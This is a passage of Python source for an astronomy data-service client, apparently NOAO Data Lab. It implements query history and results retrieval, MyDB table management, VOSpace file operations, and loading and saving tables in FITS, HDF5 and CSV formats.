        # Process optional keyword arguments: accept the legacy 'async' keyword.
        if 'async' in kw:
            async_ = kw['async']
        if self.qhistory is None:
            print ("No queries made so far")
            return
        else:
            keys = sorted(self.qhistory.keys())
            # Only async request, make sure we have some
            if async_ is True:
                asyncv = []
                for k in keys:
                    v = self.qhistory[k]
                    asyncv.append(v[2])
                if sum(asyncv) == 0:
                    print ("No ASYNC queries made so far")
                    return
            # Loop through the query history
            print ("-------------------------------------------------------------------------------------------------------------------")
            print ("QID DATE Type A/SYNC Format Status JobID Query")
            print ("-------------------------------------------------------------------------------------------------------------------")
            for k in keys:
                # qid, type, async_, query, time, jobid, username, format, status/nrows
                v = list(self.qhistory[k])  # convert to list
                # Get the (live) query status for ASYNC queries from the server
                if v[2] is True:
                    jobid = v[5]
                    token = getUserToken(self)
                    stat = queryClient.status(token, jobId=jobid)
                    v[8] = stat
                # Print the row unless we are filtering to ASYNC-only
                if (async_ is True and v[2] == True) or (async_ is not True):
                    print ("%-3d %-19s %-4s %-5s %-11s %-10s %-18s '%-s'" %
                           (v[0], time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(v[4])),
                            v[1], 'ASYNC' if v[2] else 'SYNC', v[7],
                            str(v[8]), v[5] if v[2] else "--", ' '.join(v[3].split())))
            print ("-------------------------------------------------------------------------------------------------------------------")
# Maybe leave off the jobid if we are using QID instead??!!
def querystatus(self, jobid=None):
'''
Get the async query job status.
Parameters
----------
jobid : str
This can be either (1) the Query ID (QID) returned by the dl.queryhistory() command, or
(2) the unique job identifier for the asynchronous query which was returned by :func:`ql.query`
when the query job was submitted.
Returns
-------
status : str
The status of the query, which can be one of the following:
``QUEUED`` the query job is in queue and waiting to be executed.
``EXECUTING`` the query job is currently running.
``COMPLETED`` the query is done and the results are ready to be retrieved with :func:`dl.queryresults()`.
``ERROR`` there was a problem with the query.
Example
-------
Submit an asynchronous query and then check the status.
.. code-block:: python
jobid = dl.query('SELECT ra,dec from smash_dr1.source LIMIT 100',async_=True)
Asynchronous query JobID = uqrcs8a5n8s6d0je
dl.querystatus(jobid)
COMPLETED
'''
# Not enough information input
if (jobid is None):
print ("Syntax - dl.querystatus(jobId/QID)")
return
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
# Was a QID or JobId input?
_jobid = jobid # assume a jobid was input
# QID was input
if (type(jobid) is int) or (type(jobid) is str and jobid.isdigit() is True):
keys = sorted(self.qhistory.keys())
if ((int(jobid) in keys) is False): # no QID
print ("QID = %s not found" % str(jobid))
return
v = self.qhistory[int(jobid)]
# qid, type, async_, query, time, jobid, username, format, status/nrows
if v[2] is False: # not an async query
print ("QID = %s is not an ASYNC query" % str(jobid))
return
_jobid = v[5]
# Get the status
print (queryClient.status (token, jobId=_jobid))
    def queryresults(self, jobid=None):
        '''
        Get the async query results.

        Parameters
        ----------
        jobid : str
            This can be either (1) the Query ID (QID) returned by the dl.queryhistory() command, or
            (2) the unique job identifier for the asynchronous query which was returned by :func:`ql.query`
            when the query job was submitted.

        Returns
        -------
        result : str
            The result of the query in the requested format (see ``fmt`` in :func:`dl.query`.

        Example
        -------
        Submit an asynchronous query and then check the status.

        .. code-block:: python

            jobid = dl.query('SELECT ra,dec from smash_dr1.source LIMIT 3',async_=True)
            Asynchronous query JobID = uqrcs8a5n8s6d0je

            dl.querystatus(jobid)
            COMPLETED

            results = dl.queryresults(jobid)
            print results
            ra,dec
            103.068354922718,-37.973538878907299
            103.071774116284,-37.973599429479599
            103.071597827998,-37.972329108796401
        '''
        # Not enough information input
        if (jobid is None):
            print ("Syntax - dl.queryresults(jobId/QID)")
            return
        # Check if we are logged in
        if not checkLogin(self):
            return
        token = getUserToken(self)
        # Was a QID or JobId input?
        _jobid = jobid  # assume a jobid was input
        # QID was input: resolve it through the query history
        if (type(jobid) is int) or (type(jobid) is str and jobid.isdigit() is True):
            keys = sorted(self.qhistory.keys())
            if ((int(jobid) in keys) is False):  # no QID
                print ("QID = %s not found" % str(jobid))
                return
            v = self.qhistory[int(jobid)]
            # qid, type, async_, query, time, jobid, username, format, status/nrows
            if v[2] is False:  # not an async query
                print ("QID = %s is not an ASYNC query" % str(jobid))
                return
            _jobid = v[5]
            fmt = v[7]
        # JobID input, get the output format from the matching history entry
        else:
            # NOTE(review): if the jobid is not found in the history, 'fmt'
            # is never assigned and the reformat call below raises
            # NameError -- confirm whether an unknown jobid can reach here.
            keys = sorted(self.qhistory.keys())
            for k in keys:
                v = self.qhistory[k]
                # qid, type, async_, query, time, jobid, username, format, status/nrows
                if v[5] == jobid:
                    fmt = v[7]
                    break
        # Check first if the job has been completed
        stat = queryClient.status (token, jobId=_jobid)
        if stat != 'COMPLETED':
            print ("The job has not yet completed")
            return
        # Get the results
        res = (queryClient.results (token, jobId=_jobid))
        # Convert to the desired format
        return reformatQueryOutput(self,res,fmt,verbose=True)
def listdb(self, table=''):
'''
List the user's MyDB tables.
Parameters
----------
table : str
The name of a specific table in mydb. If this is blank then all tables will be listed.
Returns
-------
list : str
The list of properties of ``table`` or all tables in mydb.
Example
-------
List the MyDB tables.
.. code-block:: python
print dl.listmydb()
table
table2
'''
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
try:
res = queryClient.list (token, table=table)
except Exception as e:
print ("Error listing MyDB tables.")
print (str(e))
else:
if res == 'relation "" not known':
print ("No tables in MyDB")
res = ''
else:
res = ' '.join(res.splitlines()) # convert to space separated list
return res
def droptable(self, table=None):
'''
Drop a user's MyDB table.
Parameters
----------
table : str
The name of a specific table in mydb to drop.
Returns
-------
list : str
The list of properties of ``table`` or all tables in mydb.
Example
-------
Drop the MyDB table called ``table``.
.. code-block:: python
print dl.listdb()
table
table2
dl.droptable('table')
table
table2
print dl.listdb()
table2
'''
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
try:
queryClient.drop (token, table=table)
except Exception as e:
print ("Error dropping table '%s'." % table)
print (str(e))
else:
print ("Table '%s' was dropped." % table)
def exporttable(self, table=None, name=None, fmt=None):
'''
Copy a user's MyDB table to a file in VOSpace.
Parameters
----------
table : str
The name of a specific table in mydb to drop.
name : str
The file name to save the table to.
fmt : str
The output file format. The available formats are 'csv', 'fits' and 'hdf5'.
If this is not specified then the file extension is used to identify the
format type.
Example
-------
Export the MyDB table called ``table`` to file ``test.csv``.
.. code-block:: python
dl.exporttable('table','test.csv')
'''
# Not enough information input
if (table is None or name is None):
print ("Syntax - dl.exporttable(table,name,fmt)")
return
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
if not name.startswith('vos://'): name = ("vos://" + name)
# Check if the table exists
res = queryClient.list (token, table='')
if table not in res.splitlines():
print ("Table '%s' not found." % table)
return
# Check if the file exists already
res = storeClient.ls(token,name,'csv')
if res != '':
print ("'%s' already exists." % name)
return
# Figure out the format type
if fmt is None:
fbase, fext = os.path.splitext(name)
fmtmap = { '.fits':'fits', '.hdf5':'hdf5', '.csv':'csv' }
try:
fmt = fmtmap[fext]
except:
print ("Format '%s' not supported. Using 'csv' instead." % fmt)
fmt = 'csv'
# Make sure the fmt is supported
if fmt not in ['fits','hdf5','csv']:
print ("Format '%s' not supported." % fmt)
return
# Make the MyDB query and output to VOSpace
try:
res = queryClient.query (token, sql='select * from mydb://'+table,out=name,fmt=fmt)
except Exception as e:
print ("Error exorting table '%s'." % table)
print (str(e))
else:
print ("Table '%s' was copied to '%s'." % (table, name))
def queryprofiles(self, profile=None):
    '''
    List the available Query Manager profiles for use with :func:`dl.query`.

    Parameters
    ----------
    profile : str
        The name of a specific Query Manager profile to check.  If this is
        blank then all of the available profile names will be listed.

    Returns
    -------
    results : str
        The properties of profile ``profile``, or a list of all available
        profiles (printed to the screen).

    Example
    -------
    List the available profiles.

    .. code-block:: python

        dl.queryprofiles()
        default,IRSA,HEASARC,Vizier,GAVO,SIMBAD,zeus1,SDSS-DR9,STScI-RegTAP,GALEX-DR6,dldb1

    Get information on a single profile.

    .. code-block:: python

        dl.queryprofiles('dldb1')
    '''
    # A valid login is required to query the service.
    if not checkLogin(self):
        return
    token = getUserToken(self)
    profiles = queryClient.list_profiles (token, profile=profile)
    print (profiles)
def schema(self, val='', fmt='text', profile='default'):
    '''
    Print information about data service schemata.

    Parameters
    ----------
    val : str
        Value to list ([[<schema>][.<table>][.<col>]]).  An empty string
        lists all available schemata.
    fmt : str
        Output format (csv|text|json).
    profile : str
        Service profile to query.

    Returns
    -------
    results : str
        The schema information is printed to the screen.

    Example
    -------
    Print out all the DL tables.

    .. code-block:: python

        datalab schema

    List all tables in a schema/catalog.

    .. code-block:: python

        datalab schema val=smash_dr1
    '''
    # Schema information is public, so no login check is needed here.
    info = queryClient.schema (value=val, format=fmt, profile=profile)
    print (info)
################################################
# Storage Manager Tasks
################################################
def ls(self, name='vos://', format='csv', verbose=False):
    '''
    List files in VOSpace.

    Parameters
    ----------
    name : str
        The name of a specific file to list. If name is blank then all files
        will be listed.
    format : str
        The format to use.
    verbose : bool
        Give more verbose output, or just a list of files. The default is
        verbose=False.

    Returns
    -------
    results : str
        The list of files in VOSpace (printed to the screen).

    Example
    -------
    List the files.

    .. code-block:: python

        dl.ls()
        test2 test1

    Verbose listing of the files in the ``public/`` directory.

    .. code-block:: python

        dl.ls('public',verbose=True)
        lrw-rw----  demo15      0B  17 May 2017 14:04:25  thisisalsoalink -> /public/smash2
        -rw-rw-r--  demo15    3.4K  17 May 2017 09:40:13  smash2
    '''
    # Check if we are logged in
    if not checkLogin(self):
        return
    token = getUserToken(self)
    # Check that we have a good token
    if not authClient.isValidToken(token):
        raise Exception ("Invalid user name and/or password provided. Please try again.")
    # Trim trailing / or /*, messes up directory listing
    if name != 'vos://':
        name = (name if not name.endswith('/') else name[:-1])
        name = (name if not name.endswith('/*') else name[:-2])
    # Run the LS command; 'raw' returns the VOSpace XML node description
    res = storeClient.ls (token, name=name, format='raw')
    # Wrap in a dummy element so several sibling nodes parse as one document
    root = ET.fromstring('<data>'+res+'</data>')
    pathbase = 'vos://datalab.noao!vospace/'+getUserName(self)+'/'
    # Check if this is a directory listing: a single vos:ContainerNode whose
    # children (under its 'nodes' element) are the directory's entries.
    if (len(root) == 1) and (root[0].attrib['{http://www.w3.org/2001/XMLSchema-instance}type'] == 'vos:ContainerNode'):
        pathbase = root[0].attrib['uri']+'/'
        for k in root[0]:
            if (k.tag.endswith('nodes') is True):
                root = k  # make the "nodes" the new root
                break
    lenpathbase = len(pathbase)
    if verbose is False:  # start output string list
        flist = []
    # Loop over nodes
    user = getUserName(self)
    for node in root:
        # Gather up all the necessary information for this node
        # (getNodeInfo presumably strips the pathbase prefix — external helper)
        vals = getNodeInfo(self, node, lenpathbase, verbose=verbose)
        if verbose is True:
            # Now print out the information, one ls -l style row per node
            print ("%10s %s %6s %s %s %s" % (vals['permissions'], user, vals['size'],
                   vals['time'], vals['verbosename'], vals['caps']))
        else:
            # Add trailing "/" for directories
            name = (vals['name']+'/' if vals['type']=='vos:ContainerNode' else vals['name'])
            flist.append("%s " % name)
    if verbose is False:
        print (' '.join(flist))
def get(self, source=None, destination=None, verbose=True):
    '''
    Get one or more files from Data Lab.

    Parameters
    ----------
    source : str
        The name of the source file on VOSpace, e.g. ``file2.txt``.
    destination : str
        The name of the local destination file, e.g. ``file1.txt``.

    Example
    -------
    Get a query output table called ``table1_output.txt`` from VOSpace.

    .. code-block:: python

        dl.get('table1_output.txt','table1_output.txt')
        (1/1) [====================] [ 9.1K] table1_output.txt
    '''
    # Guard clauses: require both names, a login, and a valid token.
    if source is None or destination is None:
        print ("Syntax - dl.get(source, destination)")
        return
    if not checkLogin(self):
        return
    token = getUserToken(self)
    if not authClient.isValidToken(token):
        raise Exception ("Invalid user name and/or password provided. Please try again.")
    # Run the GET command
    storeClient.get (token, source, destination, verbose=verbose)
def put(self, source=None, destination=None, verbose=True):
    '''
    Put files into Data Lab VOSpace.

    Parameters
    ----------
    source : str
        The name of a local file to upload to VOSpace, e.g. ``file1.txt``.
    destination : str
        The name of the destination file, e.g. ``file2.txt``.  The vos://
        prefix is accepted but not required.

    Example
    -------
    Put a catalog called ``cat.fits`` into VOSpace.

    .. code-block:: python

        dl.put('cat.fits','cat.fits')
        (1 / 1) cat.fits -> vos://cat.fits
    '''
    # Guard clauses: require both names, a login, and a valid token.
    if source is None or destination is None:
        print ("Syntax - dl.put(source, destination)")
        return
    if not checkLogin(self):
        return
    token = getUserToken(self)
    if not authClient.isValidToken(token):
        raise Exception ("Invalid user name and/or password provided. Please try again.")
    # Run the PUT command.  A plain HTTP-200 response list carries no
    # useful information, so normalize it to None for the caller.
    res = storeClient.put (token, source, destination, verbose=verbose)
    return None if res == '[<Response [200]>]' else res
def mv(self, source=None, destination=None, verbose=True):
    '''
    Move/rename a file in Data Lab VOSpace.

    Parameters
    ----------
    source : str
        The name of the file in VOSpace to move/rename, e.g. ``file1.txt``.
    destination : str
        The new name of the file in VOSpace (e.g. ``newfile1.txt``) or the
        directory to move it to.

    Example
    -------
    Rename the file ``file.txt`` to ``newfile.txt``.

    .. code-block:: python

        dl.mv('file.txt','newfile.txt')

    Move the file ``output.fits`` to the ``results/`` directory.

    .. code-block:: python

        dl.mv('output.fits','results/output.fits')
    '''
    # Guard clauses: require both names, a login, and a valid token.
    if source is None or destination is None:
        print ("Syntax - dl.mv(source, destination)")
        return
    if not checkLogin(self):
        return
    token = getUserToken(self)
    if not authClient.isValidToken(token):
        raise Exception ("Invalid user name and/or password provided. Please try again.")
    # Refuse to move a file that does not exist.
    if storeClient.ls(token, source, 'csv') == '':
        print ("'%s' not found" % source)
        return
    # Run the MV command
    storeClient.mv (token, fr=source, to=destination, verbose=verbose)
def cp(self, source=None, destination=None, verbose=True):
    '''
    Copy a file in Data Lab VOSpace.

    Parameters
    ----------
    source : str
        The name of the file in VOSpace to copy, e.g. ``file1.txt``.
    destination : str
        The new name of the file in VOSpace, e.g. ``newfile1.txt``.

    Example
    -------
    Copy the file ``file1.txt`` to ``newfile.txt``.

    .. code-block:: python

        dl.cp('file1.txt','newfile.txt')
    '''
    # Guard clauses: require both names, a login, and a valid token.
    if source is None or destination is None:
        print ("Syntax - dl.cp(source, destination)")
        return
    if not checkLogin(self):
        return
    token = getUserToken(self)
    if not authClient.isValidToken(token):
        raise Exception ("Invalid user name and/or password provided. Please try again.")
    # Refuse to copy a file that does not exist.
    if storeClient.ls(token, source, 'csv') == '':
        print ("'%s' not found" % source)
        return
    # Run the CP command
    storeClient.cp (token, fr=source, to=destination, verbose=verbose)
def rm(self, name=None, verbose=True):
    '''
    Delete files in Data Lab VOSpace.

    Parameters
    ----------
    name : str
        The name of the file in VOSpace to delete, e.g. ``file1.txt``.

    Example
    -------
    Delete the file ``file1.txt``.

    .. code-block:: python

        dl.rm('file1.txt')
    '''
    # Guard clauses: require a name, a login, and a valid token.
    if name is None:
        print ("Syntax - dl.rm(name)")
        return
    if not checkLogin(self):
        return
    token = getUserToken(self)
    if not authClient.isValidToken(token):
        raise Exception ("Invalid user name and/or password provided. Please try again.")
    # Run the RM command
    storeClient.rm (token, name=name, verbose=verbose)
def ln(self, target=None, link=None):
    '''
    Link a file in Data Lab VOSpace.

    Parameters
    ----------
    target : str
        The name of the file in VOSpace to link to, e.g. ``file1.txt``.
    link : str
        The name of the link, e.g. ``file1link``.

    Example
    -------
    Create a link called ``iamlink`` to the file ``file1.txt``.

    .. code-block:: python

        dl.ln('file1.txt','iamlink')
    '''
    # Guard clauses: require both names, a login, and a valid token.
    if link is None or target is None:
        print ("Syntax - dl.ln(target, link)")
        return
    if not checkLogin(self):
        return
    token = getUserToken(self)
    if not authClient.isValidToken(token):
        raise Exception ("Invalid user name and/or password provided. Please try again.")
    # storeClient.ln requires the vos:// prefix on both names.
    if not link.startswith("vos://"):
        link = "vos://" + link
    if not target.startswith("vos://"):
        target = "vos://" + target
    # Run the LN command
    storeClient.ln (token, fr=link, target=target)
def mkdir(self, name=None):
    '''
    Create a directory in Data Lab VOSpace.

    Parameters
    ----------
    name : str
        The name of the directory in VOSpace to create, e.g. ``results``.

    Example
    -------
    Create the directory ``data1/``.

    .. code-block:: python

        dl.mkdir('data1')
    '''
    # Guard clauses: require a name, a login, and a valid token.
    if name is None:
        print ("Syntax - dl.mkdir(name)")
        return
    if not checkLogin(self):
        return
    token = getUserToken(self)
    if not authClient.isValidToken(token):
        raise Exception ("Invalid user name and/or password provided. Please try again.")
    # storeClient.mkdir currently requires the vos:// prefix.
    if not name.startswith('vos://'):
        name = 'vos://' + name
    # Run the MKDIR command
    storeClient.mkdir (token, name=name)
def rmdir(self, name=None):
    '''
    Delete a directory in Data Lab VOSpace.

    Parameters
    ----------
    name : str
        The name of the directory in VOSpace to delete, e.g. ``results``.

    Example
    -------
    Delete the directory ``data1/``.

    .. code-block:: python

        dl.rmdir('data1')
    '''
    # Guard clauses: require a name, a login, and a valid token.
    if name is None:
        print ("Syntax - dl.rmdir(name)")
        return
    if not checkLogin(self):
        return
    token = getUserToken(self)
    if not authClient.isValidToken(token):
        raise Exception ("Invalid user name and/or password provided. Please try again.")
    # Run the RMDIR command
    storeClient.rmdir (token, name=name)
def copyurl(self, url=None, name=None):
    '''
    Copy a file to VOSpace using a URL.

    Parameters
    ----------
    url : str
        The URL location of the file.
    name : str
        The name of the file in VOSpace.  The vos:// prefix is not
        necessary.

    Example
    -------
    Copy http://www.mywebsite.com/file1.fits to output1.fits in VOSpace.

    .. code-block:: python

        dl.copyurl('http://www.mywebsite.com/file1.fits','output1.fits')
    '''
    # Guard clauses: require both values, a login, and a valid token.
    if url is None or name is None:
        print ("Syntax - dl.copyurl(url,name)")
        return
    if not checkLogin(self):
        return
    token = getUserToken(self)
    if not authClient.isValidToken(token):
        raise Exception ("Invalid user name and/or password provided. Please try again.")
    # storeClient.load requires the vos:// prefix on the target name.
    if not name.startswith('vos://'):
        name = 'vos://' + name
    # Run the LOAD command
    storeClient.load(token, name, url)
def load(self, name=None, inpfmt=None, fmt='pandas', ext=None):
    '''
    Load a file from VOSpace or local disk into a data object in memory.

    Parameters
    ----------
    name : str
        The name of the file to load into memory.  The vos:// prefix is
        necessary, otherwise it is assumed to be a local file that should
        be read.  Currently only FITS binary tables, HDF5, CSV and ASCII
        file formats are supported.
    inpfmt : str
        The input format type. The currently supported types are FITS binary
        tables, HDF5, CSV, and ASCII files ('string').  If this is not
        specified then the file extension of ``name`` is used to attempt to
        figure out the format.
    fmt : str
        The data type format to output. Permitted values are:
          * 'csv'         comma-separated string (newlines at row ends)
          * 'ascii'       same as csv but tab-delimited
          * 'string'      a straight read of ASCII into a string
          * 'array'       Numpy array
          * 'structarray' Numpy structured / record array
          * 'pandas'      a Pandas data frame
          * 'table'       Astropy Table format
          * 'votable'     string XML-formatted as a VO table
        The output type for a FITS image is a numpy array. For other data
        'pandas' is the default format.
    ext : int
        The FITS extension to load for images. The default is 1 for a FITS
        binary table and 0 for a FITS image.

    Example
    -------
    Load the file "output.fits" into a pandas data frame.

    .. code-block:: python

        df = dl.load('output.fits',fmt='pandas')

    Load a FITS image "im1.fits".

    .. code-block:: python

        im,head = dl.load('im1.fits')
    '''
    # Not enough information input
    if (name is None):
        print ("Syntax - dl.load(name,inpfmt=inpfmt,fmt=fmt,ext=ext)")
        return
    # Only fits, hdf5, csv and string input formats currently supported
    if inpfmt != None and inpfmt != '' and inpfmt not in ['fits','hdf5','csv','string']:
        print ("Format '%s' not currently supported for input file." % inpfmt)
        return
    # Use file extension to figure out input format
    if inpfmt is None:
        fbase, fext = os.path.splitext(name)
        inpfmtmap = { '.fits':'fits', '.hdf5':'hdf5', '.csv':'csv', '.txt':'string' }
        try:
            inpfmt = inpfmtmap[fext]
        except:
            print ("Cannot use file extension to determine 'inpfmt'")
            return
    # Check token if reading from VOSpace
    if name.startswith("vos://"):
        # Check if we are logged in
        if not checkLogin(self):
            return
        token = getUserToken(self)
        # Check that we have a good token
        if not authClient.isValidToken(token):
            raise Exception ("Invalid user name and/or password provided. Please try again.")
    # Check that the file exists (VOSpace or local, as appropriate)
    if name.startswith("vos://"):
        res = storeClient.ls(token,name,'csv')
        if res == '':
            print ("'%s' not found" % name)
            return
    else:
        if os.path.exists(name) is False:
            print ("'%s' not found" % name)
            return
    # Load the necessary packages lazily; touching __doc__ fails if the
    # module is not yet imported, triggering the import in the except.
    # astropy fits
    try:
        dum = fits.__doc__
    except:
        from astropy.io import fits
    # astropy Table
    try:
        dum = Table.__doc__
    except:
        from astropy.table import Table
    # astropy votable
    try:
        dum = from_table.__doc__
    except:
        from astropy.io.votable import from_table
    # Reading and conversion mapping, keyed by 'inpfmt-fmt':
    # element [0] reads (x=filename), element [1] converts (x=data object)
    writemap = { 'fits-csv': (lambda x: Table.read(x,format='fits'), partial(convertTableToFormat,format='ascii.csv')),
                 'fits-ascii': (lambda x: Table.read(x,format='fits'), partial(convertTableToFormat,format='ascii.tab')),
                 'fits-array': (lambda x: Table.read(x,format='fits'), lambda x: x.as_array()),
                 'fits-structarray': (lambda x: Table.read(x,format='fits'), lambda x: x.as_array()),
                 'fits-pandas': (lambda x: Table.read(x,format='fits'), lambda x: x.to_pandas()),
                 'fits-table': (lambda x: Table.read(x,format='fits'), lambda x: x),
                 'fits-votable': (lambda x: Table.read(x,format='fits'), lambda x: from_table(x).resources[0].tables[0]),
                 'hdf5-csv': (lambda x: Table.read(x,format='hdf5'), partial(convertTableToFormat,format='ascii.csv')),
                 'hdf5-ascii': (lambda x: Table.read(x,format='hdf5'), partial(convertTableToFormat,format='ascii.tab')),
                 'hdf5-array': (lambda x: Table.read(x,format='hdf5'), lambda x: x.as_array()),
                 'hdf5-structarray': (lambda x: Table.read(x,format='hdf5'), lambda x: x.as_array()),
                 'hdf5-pandas': (lambda x: Table.read(x,format='hdf5'), lambda x: x.to_pandas()),
                 'hdf5-table': (lambda x: Table.read(x,format='hdf5'), lambda x: x),
                 'hdf5-votable': (lambda x: Table.read(x,format='hdf5'), lambda x: from_table(x).resources[0].tables[0]),
                 'csv-csv': (lambda x: readAscii(x), lambda x: x),
                 'csv-ascii': (lambda x: Table.read(x,format='csv'), partial(convertTableToFormat,format='ascii.tab')),
                 'csv-array': (partial(np.loadtxt,skiprows=1,delimiter=','), lambda x: x),
                 'csv-structarray': (lambda x: Table.read(x,format='csv'), lambda x: x.as_array()),
                 'csv-pandas': (lambda x: Table.read(x,format='ascii.csv'), lambda x: x.to_pandas()),
                 'csv-table': (lambda x: Table.read(x,format='ascii.csv'), lambda x: x),
                 'csv-votable': (lambda x: Table.read(x,format='ascii.csv'), lambda x: from_table(x).resources[0].tables[0]),
                 'string-string': (lambda x: readAscii(x), lambda x: x) }
    # Should add HDF5, use Table.read(x,format='hdf5',path='data'), h5py must be installed
    # Check that we can do the operation
    mapcode = inpfmt+'-'+fmt
    if mapcode not in writemap.keys():
        print ("Output format '%s' not supported for input type '%s'" % (fmt, inpfmt) )
        return
    # Open the file: VOSpace reads come back as a string, wrap in StringIO
    if name.startswith('vos://'):
        fh = StringIO( storeClient.get(token,name,'',verbose=False) )
    else:
        fh = open(name,'rb')
    # If this is a FITS file, check if its a binary table or image
    if inpfmt == 'fits':
        fitstable = False
        hd = fits.getheader(fh)
        fh.seek(0) # reset to beginning of file
        # NOTE(review): assumes the primary header has an EXTEND card —
        # a KeyError here would propagate; confirm against typical inputs.
        if hd['EXTEND'] is True:
            try:
                tryext = (1 if ext is None else ext)
                hd1 = fits.getheader(fh,tryext)
                if hd1['XTENSION'] == 'BINTABLE': fitstable=True
            except:
                pass
            fh.seek(0) # reset to beginning of file
    # Load a Fits image file (returns data + header tuple)
    if inpfmt == 'fits' and fitstable is False:
        try:
            if ext is None: ext=0
            return fits.getdata(fh,ext,header=True)
        except Exception as e:
            print ("There was an error loading the FITS image '%s'" % name)
            print (str(e))
            return
    # Step 1) Read the file
    try:
        rdata = writemap[mapcode][0](fh)
    except Exception as e:
        print ("Error reading file")
        print (str(e))
        return
    # Step 2) Convert to output format
    try:
        return writemap[mapcode][1](rdata)
    except Exception as e:
        print ("Error converting data")
        print (str(e))
        return
def save(self, data=None, name=None, fmt=None, clobber=False):
    '''
    Save the string representation of a data object to a file in VOSpace
    (names starting with 'vos://') or on local disk.

    Parameters
    ----------
    data : object
        The data object such as a pandas data frame or numpy structured array.
    name : str
        The name of the file to create.  The vos:// prefix selects VOSpace
        output; otherwise the file is written locally.
    fmt : str
        The format to use for the output file. If this is not specified then
        the file extension of ``name`` is used to attempt to figure out the
        format.  The currently supported input and output formats are:

            Data type     Format
            csv           csv
            ascii         ascii
            array         csv/fits
            structarray   csv/fits
            pandas        csv/fits/hdf5
            table         csv/fits/hdf5
            votable       csv/fits/hdf5
    clobber : bool
        Whether to overwrite an existing file. The default is False.

    Example
    -------
    Save the pandas data frame called "df" to a file called "data1.csv"
    in VOSpace.

    .. code-block:: python

        dl.save(df,'data1.csv')
    '''
    # Not enough information input
    if data is None or name is None:
        print ("Syntax - dl.save(data,name,fmt=fmt,clobber=clobber)")
        return
    # If fmt is None then try to guess format from the output filename extension
    if fmt is None:
        fbase, fext = os.path.splitext(name)
        fmtmap = { '.fits':'fits', '.hdf5':'hdf5', '.csv':'csv', '.xml':'xml' }
        try:
            fmt = fmtmap[fext]
        except KeyError:
            print ("Cannot use file extension to determine 'fmt'")
            return
    # Map the Python type of the input object to an internal type name:
    # -'csv'         type='str', ',' delimited
    # -'ascii'       type='str', '\t' delimited
    # -'array'       numpy array, data.dtype.names is None, len(data.shape)=2
    # -'structarray' numpy structured array, len(data.shape)=1
    # -'pandas'      pandas.core.frame.DataFrame
    # -'table'       astropy.table.table.Table
    # -'votable'     astropy.io.votable.tree.Table
    inptypemap = {'str':'csv', 'numpy.ndarray':'numpy','pandas.core.frame.DataFrame':'pandas',
                  'astropy.table.table.Table':'table', 'astropy.io.votable.tree.Table':'votable'}
    datatype = str(type(data)).split("'")[1]   # "<type 'numpy.ndarray'>"
    try:
        inptype = inptypemap[datatype]
    except KeyError:
        print ("Data object type %s not supported." % datatype)
        # BUGFIX: bail out here; 'inptype' is undefined past this point
        # and the original code crashed with a NameError.
        return
    # Discern 'csv' vs. 'ascii' by which delimiter dominates a sample
    if inptype == 'csv':
        if len(data[0:5000].split('\t')) > len(data[0:5000].split(',')): inptype='ascii'
    # Discern 'array' vs. 'structarray'
    if inptype == 'numpy':
        inptype = 'array'  # default
        if len(data.shape) == 1: inptype='structarray'
    # Import the modules lazily if necessary; touching __doc__ fails when
    # the module is not yet imported, triggering the import in the except.
    # astropy fits
    try:
        dum = fits.__doc__
    except:
        from astropy.io import fits
    # astropy Table
    try:
        dum = Table.__doc__
    except:
        from astropy.table import Table
    # astropy votable
    try:
        # BUGFIX: was 'writeo' (undefined name), so the presence check
        # always failed and the import always re-ran.
        dum = writeto.__doc__
    except:
        from astropy.io.votable import from_table, writeto
    # Check token if writing to VOSpace
    if name.startswith("vos://"):
        # Check if we are logged in
        if not checkLogin(self):
            return
        token = getUserToken(self)
        # Check that we have a good token
        if not authClient.isValidToken(token):
            raise Exception ("Invalid user name and/or password provided. Please try again.")
    # Check if the file exists already (honoring clobber)
    if name.startswith("vos://"):
        res = storeClient.ls(token,name,'csv')
        if res != '':
            if clobber is False:
                print ("'%s' already exists." % name)
                return
            else:
                storeClient.rm(token,name)  # clobber it
    else:
        if os.path.exists(name) is True:
            if clobber is False:
                print ("'%s' already exists." % name)
                return
            else:
                os.remove(name)  # clobber it
    # What local file are we writing to:
    # 1) local file, use name
    # 2) vos:// file, use a temporary filename then upload
    outname = name
    if name.startswith("vos://"):
        tfd = tempfile.NamedTemporaryFile()
        outname = tfd.name
        tfd.close()
    # Writer dispatch table, keyed by 'inptype-fmt': x=data, y=filename
    writemap = { 'csv-csv': lambda x,y: writeAscii(y, x),
                 'ascii-csv': lambda x,y: writeAscii(y, x),  # use tab-delimited
                 'ascii-ascii': lambda x,y: writeAscii(y, x),
                 'array-csv': lambda x,y: np.savetxt(y,x,delimiter=','),
                 'array-fits': lambda x,y: fits.writeto(y,x,overwrite=True),
                 'structarray-csv': lambda x,y: np.savetxt(y,x,delimiter=',',header=','.join(x.dtype.names)),
                 'structarray-fits': lambda x,y: fits.writeto(y,x,overwrite=True),
                 'pandas-csv': lambda x,y: x.to_csv(y,sep=',',header=True),
                 'pandas-fits': lambda x,y: Table.from_pandas(x).write(y,format='fits'),
                 'pandas-hdf5': lambda x,y: Table.from_pandas(x).write(y,format='hdf5',path='table'),
                 'table-csv': lambda x,y: x.write(y,format='ascii.csv'),
                 'table-fits': lambda x,y: x.write(y,format='fits'),
                 'table-hdf5': lambda x,y: x.write(y,format='hdf5',path='table'),
                 'votable-csv': lambda x,y: x.to_table().write(y,format='ascii.csv'),
                 'votable-fits': lambda x,y: x.to_table().write(y,format='fits'),
                 'votable-hdf5': lambda x,y: x.to_table().write(y,format='hdf5',path='table') }
    # Check that we can deal with the requested input and output formats
    if inptype+'-'+fmt not in writemap.keys():
        print ("Output format '%s' for data type '%s' not currently supported." % (fmt, inptype))
        return
    # Write the file
    try:
        writemap[inptype+'-'+fmt](data,outname)
    except Exception as e:
        print ("There was a problem writing the file")
        print (str(e))
        # BUGFIX: do not upload a file that was never (fully) written.
        return
    # Put to VOSpace if necessary
    if name.startswith('vos://'):
        storeClient.put (token, outname, name, verbose=False)
        os.remove(outname)  # remove temporary file
################################################
# SIA Tasks
################################################
def siaquery(self, ra=None, dec=None, dist=None, verbose=False):
    '''
    Perform a SIA (Simple Image Access) query with a set of coordinates.

    Parameters
    ----------
    ra : float
        The right ascension (in degrees) of the point to use for the search.
    dec : float
        The declination (in degrees) of the point to use for the search.
    dist : float
        The search distance (radius) in degrees. The default is 0.0085 deg.
    verbose : bool
        Use verbose output. The default is False.

